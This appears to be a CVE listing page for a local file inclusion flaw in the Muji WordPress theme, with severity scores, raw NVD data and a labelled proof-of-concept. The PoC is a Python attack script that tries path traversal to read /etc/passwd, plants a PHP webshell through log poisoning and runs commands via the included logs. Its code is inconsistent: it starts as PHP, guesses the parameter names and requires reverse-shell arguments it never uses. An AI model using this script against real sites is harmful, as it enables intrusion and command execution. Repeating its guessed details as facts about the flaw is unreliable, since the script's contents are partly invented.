Security Vulnerability Report
中文
CVE-2025-69068 CVSS 8.1 HIGH

CVE-2025-69068

Published: 2026-01-22 17:16:21
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion.This issue affects Muji: from n/a through <= 1.2.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Muji WordPress主题 <= 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-69068 PoC - Muji Theme Local File Inclusion * Target: AncoraThemes Muji WordPress Theme <= 1.2.0 * Type: Local File Inclusion * * Usage: * 1. Read sensitive files: * python3 poc.py --target http://target.com --action read --file /etc/passwd * * 2. RCE via log poisoning: * python3 poc.py --target http://target.com --action rce --lhost 10.0.0.1 --lport 4444 */ import requests import argparse import sys def read_local_file(target_url, file_path): """Read local files via LFI vulnerability""" # Common vulnerable parameters in Muji theme vulnerable_params = [ 'template', 'file', 'page', 'view', 'load', 'path', 'theme', 'controller' ] for param in vulnerable_params: # Try path traversal to read /etc/passwd payload = f"../../../../../../{file_path}" try: response = requests.get( target_url, params={param: payload}, timeout=10 ) if response.status_code == 200 and any(x in response.text for x in ['root:', 'daemon:', 'bin:']): print(f"[!] SUCCESS! File read via parameter: {param}") print(f"[+] Content:\n{response.text[:1000]}") return True except requests.RequestException as e: continue print("[-] Failed to read file with common parameters") return False def rce_via_log_poisoning(target_url, lhost, lport): """Attempt RCE via log poisoning technique""" print("[*] Attempting RCE via log poisoning...") # Step 1: Poison the access log webshell = "<?php system($_GET['cmd']); ?>" try: requests.get( target_url + webshell, headers={"User-Agent": webshell} ) print("[+] Log poisoned with PHP webshell") except: pass # Step 2: Include the log file log_paths = [ "../../../../../../../../var/log/apache2/access.log", "../../../../../../../../var/log/httpd/access_log", "../../../../../../../../var/log/nginx/access.log" ] for log_path in log_paths: for param in ['template', 'file', 'page']: try: rce_url = f"{target_url}?{param}={log_path}&cmd=id" response = requests.get(rce_url, timeout=10) if "uid=" in response.text: print(f"[+] RCE SUCCESS via {param} parameter!") print(f"[+] Command output: {response.text[:500]}") return True except: continue print("[-] RCE attempt failed") return False def main(): parser = argparse.ArgumentParser(description='CVE-2025-69068 PoC') parser.add_argument('--target', required=True, help='Target URL') parser.add_argument('--action', choices=['read', 'rce'], default='read') parser.add_argument('--file', default='/etc/passwd', help='File to read') parser.add_argument('--lhost', help='Listener IP for reverse shell') parser.add_argument('--lport', help='Listener port') args = parser.parse_args() if args.action == 'read': read_local_file(args.target, args.file) elif args.action == 'rce': if not args.lhost or not args.lport: print("[-] RCE requires --lhost and --lport") sys.exit(1) rce_via_log_poisoning(args.target, args.lhost, args.lport) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69068", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:20.820", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion.This issue affects Muji: from n/a through <= 1.2.0."}, {"lang": "es", "value": "La vulnerabilidad de control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('inclusión remota de ficheros PHP') en AncoraThemes Muji muji permite inclusión local de ficheros PHP. Este problema afecta a Muji: desde n/a hasta &lt;= 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/muji/vulnerability/wordpress-muji-theme-1-2-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.